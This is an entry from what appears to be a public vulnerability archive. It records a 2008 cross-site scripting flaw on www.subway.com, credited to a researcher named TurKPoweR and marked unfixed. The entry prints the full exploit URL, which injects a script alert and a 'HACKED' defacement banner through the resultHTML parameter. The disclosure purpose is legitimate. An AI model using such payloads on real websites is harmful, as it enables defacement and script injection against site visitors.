Security researcher TurKPoweR, has submitted on 12/06/2008 a cross-site-scripting (XSS) vulnerability affecting www.subway.com, which at the time of submission ranked 11400 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 17/06/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 12/06/2008 |
Date published: 17/06/2008 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: TurKPoweR |
Domain: www.subway.com |
Category: XSS |
Pagerank: 11400 |
|---|
URL: http://www.subway.com/applications/inetleads/frmfailure.aspx?LC=ENG&CC=111-222-1933email@address.tst
&resultHTML="><script>alert('HACKED%20By%20TurKPoweR')</script><marquee><h1>Dafeced%20By%20TurKPoweR
</h1></marquee> |
|
Click here to view the mirror
|
|
|
| 
